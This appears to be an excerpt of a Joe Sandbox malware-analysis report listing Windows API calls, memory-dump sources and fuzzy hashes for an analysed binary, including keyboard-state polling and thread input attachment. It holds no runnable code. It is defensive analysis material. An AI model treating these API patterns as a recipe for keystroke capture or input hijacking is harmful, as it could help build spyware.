                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 89c4002d81c183068ee62f4761890663185a07edb4fcf3cf9eef6955c68f67a2
                                                                                                                                                                                                                                                                                        • Instruction ID: 142f5363b1dc2362b2ed2fbc6943fa285c28b2b788004d5a917ca4a42ec01ae2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89c4002d81c183068ee62f4761890663185a07edb4fcf3cf9eef6955c68f67a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6C12A75A00109EFDB14DFA4C888DAEBBF9FF48354B148099E41ADB261DB30ED46DB91
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F6039F
                                                                                                                                                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00F603F8
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F6040A
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F6042A
                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00F6047D
                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F60491
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F604A6
                                                                                                                                                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00F604B3
                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F604BC
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F604CE
                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F604D9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 61fc997205f632174481de19c9b7bf5df964e493086556f99f0db60607118d02
                                                                                                                                                                                                                                                                                        • Instruction ID: 02ff469f39148cfc9cb1ff1e929203de537aea53ee2c4781dba86f8c04fe1a58
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61fc997205f632174481de19c9b7bf5df964e493086556f99f0db60607118d02
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99415E35E0021DDFCB14DFA8DC449AEBBB9EF48354F108469E945A7261CB34A945EFA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6A65D
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00F6A6DE
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00F6A6F9
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00F6A713
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00F6A728
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00F6A740
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00F6A752
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00F6A76A
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00F6A77C
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00F6A794
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00F6A7A6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a5109335fa54cbde99549e7472d38477cc8587f90346c8bdf191b13c8b202318
                                                                                                                                                                                                                                                                                        • Instruction ID: 4a3225b79b0c9f1b56e65b559db3c45da439d80b87342ee3da6bab8398b24597
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5109335fa54cbde99549e7472d38477cc8587f90346c8bdf191b13c8b202318
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5341C674D047CA6DFF319B64C9043A5BEF06B12364F08805AD5C66A1C2EB959DC8EFA3
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                        • Opcode ID: f5e9b8c26273ed255da3a88fa25f5eca49e5ee070a4c9a5d399a83b4226da0fc
                                                                                                                                                                                                                                                                                        • Instruction ID: 2587d87bb437a3612daae83d3047b283a9551b2f66301d0d9fb47abfdbf13764
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5e9b8c26273ed255da3a88fa25f5eca49e5ee070a4c9a5d399a83b4226da0fc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6851E531E081179BCF14EFA8C9419FEB3A5BF55360B644229E826E7284D7B5DD40F790
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32 ref: 00F841D1
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F841DC
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00FA0B44,?), ref: 00F84236
                                                                                                                                                                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 00F842A9
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F84341
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F84393
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                        • Opcode ID: 892f8a534429a69ab4a1b38f62c216c7f112e9a360b2428bf26d2f929b79397f
                                                                                                                                                                                                                                                                                        • Instruction ID: adf06559df73234a9fd02ee6ba3902fbeb7594517ce3d5e5c8700d74aaa44ee2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 892f8a534429a69ab4a1b38f62c216c7f112e9a360b2428bf26d2f929b79397f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1061BF71608702DFC710EF64D889FAABBE4AF49714F10090AF8859B291CB74ED44EB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00F78C9C
                                                                                                                                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F78CAC
                                                                                                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F78CB8
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F78D55
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78D69
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78D9B
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F78DD1
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78DDA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: 260f6c9bbfbde7057ce2739172c60c5e55ceaccc0ae7081d9a2bcab5eb1fc216
                                                                                                                                                                                                                                                                                        • Instruction ID: 64c0a3287f5aa54fa8055a4caac611fccb0447a3316dadbef8849c8278b49827
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 260f6c9bbfbde7057ce2739172c60c5e55ceaccc0ae7081d9a2bcab5eb1fc216
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A616C725043059FCB10EF60C84599EB7E8FF99320F04891EF999C7291DB35E946EB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateMenu.USER32 ref: 00F94715
                                                                                                                                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00F94724
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F947AC
                                                                                                                                                                                                                                                                                        • IsMenu.USER32(?), ref: 00F947C0
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00F947CA
                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F947F7
                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32 ref: 00F947FF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                        • String ID: 0$F
                                                                                                                                                                                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                        • Opcode ID: f80c00ac4213e9fdc25168da2aa0a80c7abb4fb7b08f0da480692966d5a957cf
                                                                                                                                                                                                                                                                                        • Instruction ID: 221bf0bf543cf05c7472ef4979d7e85673b83613f831e104e5d37c90631bb3d3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f80c00ac4213e9fdc25168da2aa0a80c7abb4fb7b08f0da480692966d5a957cf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416775A01209AFEF24CFA4D884EEA7BB6FF59324F144029FA45A7390C770A915EF50
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F628B1
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00F628BC
                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 00F628D8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F628DB
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F628E4
                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 00F628F8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F628FB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00F62990
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00F6299B
                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 00F629B7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F629BA
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F629C3
                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 00F629D7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F629DA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F94539
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F9453C
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F94563
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F94586
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F945FE
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00F94648
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00F94663
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00F9467E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00F94692
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00F946AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F6BB18
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB2C
                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00F6BB33
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB42
                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F6BB54
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB6D
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BB7F
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BBC4
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BBD9
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F6ABA8,?,00000001), ref: 00F6BBE4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33007
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33013
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3301E
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33029
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33034
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3303F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3304A
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33055
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F33060
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3306E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F02AF9
                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00F02B98
                                                                                                                                                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00F02D7D
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F43A1B
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F43A80
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F43AAD
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                        • String ID: close all
